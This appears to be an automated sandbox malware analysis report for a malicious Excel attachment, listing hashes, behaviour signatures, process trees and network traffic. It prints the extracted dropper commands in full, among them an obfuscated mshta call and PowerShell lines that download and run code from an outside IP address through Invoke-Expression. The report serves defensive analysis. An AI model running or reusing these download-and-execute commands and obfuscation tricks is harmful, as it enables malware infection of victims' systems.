
Analysis

  • max time kernel
    16s
  • max time network
    19s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    21/01/2022, 05:03 UTC

General

  • Target
    PO 01212022.xls
  • Size
    69KB
  • MD5
    3a1495184751bb9daebf21f57c88896d
  • SHA1
    5aa023ed500a7f8b476c404b26e79a7600ecd3d6
  • SHA256
    2c9af469fcb89bb2e93d1ac70ce0bec912b78d5c3cbadccc3040c18dd03f5e41
  • SHA512
    738dee6362259030dafd18956535c5726a3e7bcb783392eb0b9fcc48dc76c6dad8fae675fc56262936847b75b92c2aecbda2c00f6c838eb084a45a027fa3a827

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
    mshta http://0xb907d607/fer/fe2.html
  • URLs
    hta.dropper
    http://0xb907d607/fer/fe2.html

Extracted

  • Language
    ps1
  • Deobfuscated

    # powershell snippet 0
    $c1 = "(New-Object Net.We"
    $c4 = "bClient).Downlo"
    $c3 = "adString('http://185.7.214.7/fer/fe2.png')"
    $ji = "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"
    invoke-expression "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"|invoke-expression

    # powershell snippet 1
    (new-object net.webclient).downloadstring("http://185.7.214.7/fer/fe2.png")

  • URLs
    ps1.dropper
    http://185.7.214.7/fer/fe2.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO 01212022.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3940
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:656
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
            PID:3280
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
      1⤵
        PID:3664
      • C:\Windows\System32\WaaSMedicAgent.exe
        C:\Windows\System32\WaaSMedicAgent.exe 30ce4e94747d62af19b2b967801c8d0a gQLlMe+ltUaef2OZ+Qktjg.0.1.0.0.0
        1⤵
        • Modifies data under HKEY_USERS
        PID:624
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 420 -p 1880 -ip 1880
        1⤵
          PID:3868

Network

  • [US] DNS settings-win.data.microsoft.com
    Remote address: 8.8.8.8:53
    Request
      settings-win.data.microsoft.com IN A
    Response
      settings-win.data.microsoft.com IN CNAME settingsfd-geo.trafficmanager.net
      settingsfd-geo.trafficmanager.net IN A 20.73.194.208
  • [RU] GET http://185.7.214.7/fer/fe2.html (mshta.exe)
    Remote address: 185.7.214.7:80
    Request
      GET /fer/fe2.html HTTP/1.1
      Accept: */*
      Accept-Language: en-US
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
      Host: 185.7.214.7
      Connection: Keep-Alive
    Response
      HTTP/1.1 200 OK
      Server: nginx/1.20.1
      Date: Fri, 21 Jan 2022 05:04:08 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
  • 40.126.31.137:443
    login.live.com
    tls
    6.4kB / 19.0kB / 19 / 19
  • 20.73.194.208:443
    settings-win.data.microsoft.com
    tls, https
    1.3kB / 8.1kB / 14 / 14
  • 127.0.0.1:5985
  • 20.73.194.208:443
    settings-win.data.microsoft.com
    tls, https
    2.5kB / 9.6kB / 15 / 16
  • 185.7.214.7:80
    http://185.7.214.7/fer/fe2.html
    http
    mshta.exe
    819 B / 11.7kB / 12 / 11
    HTTP Request
      GET http://185.7.214.7/fer/fe2.html
    HTTP Response
      200
  • 8.8.8.8:53
    settings-win.data.microsoft.com
    dns
    77 B / 140 B / 1 / 1
    DNS Request
      settings-win.data.microsoft.com
    DNS Response
      20.73.194.208

MITRE ATT&CK Enterprise v6


Downloads

  • memory/3940-130-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp
    Filesize: 64KB
  • memory/3940-131-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp
    Filesize: 64KB
  • memory/3940-132-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp
    Filesize: 64KB
  • memory/3940-133-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp
    Filesize: 64KB
  • memory/3940-134-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp
    Filesize: 64KB
  • memory/3940-137-0x00007FF7D5110000-0x00007FF7D5120000-memory.dmp
    Filesize: 64KB
  • memory/3940-138-0x00007FF7D5110000-0x00007FF7D5120000-memory.dmp
    Filesize: 64KB
